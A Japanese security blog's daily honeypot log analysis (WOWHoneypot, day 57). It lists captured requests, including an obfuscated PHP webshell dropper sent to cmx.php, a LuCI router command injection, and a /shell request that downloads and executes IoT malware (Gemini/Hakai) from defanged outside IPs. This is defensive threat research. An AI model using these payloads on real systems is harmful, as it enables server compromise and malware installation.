S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(57日目)

WOWHoneypotの簡易分析(57日目)

honeypot

WOWhoneypotの2018/07/30(月) (運用57日目)の簡易分析です。
本日の総アクセス件数は 56件です。本日は件数が少ないです。
以下が全アクセスログです。

31 2018-07-30 GET /
3 2018-07-30 POST /images.php
3 2018-07-30 POST /cmx.php
3 2018-07-30 GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
2 2018-07-30 GET /pma/scripts/setup.php
2 2018-07-30 GET /phpMyAdmin/scripts/setup.php
2 2018-07-30 GET /myadmin/scripts/setup.php
2 2018-07-30 GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
1 2018-07-30 HEAD /robots.txt
1 2018-07-30 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-30 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-30 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
1 2018-07-30 GET /phpmyadmin/scripts/setup.php
1 2018-07-30 GET /MyAdmin/scripts/setup.php
1 2018-07-30 GET /cmx.php?cmd=uname+-a
1 2018-07-30 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

phpMyAdmin関連(8件)とphpに対するPOST(6件)と/アクセスを除外したアクセス数です。

3 2018-07-30 GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
2 2018-07-30 GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
1 2018-07-30 HEAD /robots.txt
1 2018-07-30 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-30 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-30 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
1 2018-07-30 GET /cmx.php?cmd=uname+-a
1 2018-07-30 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

本日新たに出てきたのは、以下です。 

GET /cmx.php?cmd= ... ... Hello, Peppa!

同一パスに対してPOSTしているアクセスのボディ部とGETのクエリは同じでした。
これは末尾の挨拶が一緒の為、これまでphpに対してPOSTが来ていたものと同一アクターの攻撃と思われます。
IPは9件ほぼ全てバラバラでした。
名前があった方が識別しやすい為、今後このアクターはPeppa君と呼びましょう。

その他はZmEuによるスキャンがあったのと、IoT機器に対するGeminiとHakaiの攻撃です。

 

本日のハンティングログは以下です。IoT系の2種です。

1 2018-07-30 wget+hxxp://199.195.254[.]118/jaws
1 2018-07-30 wget hxxp://178.128.11[.]199/rvs 

 

以上です。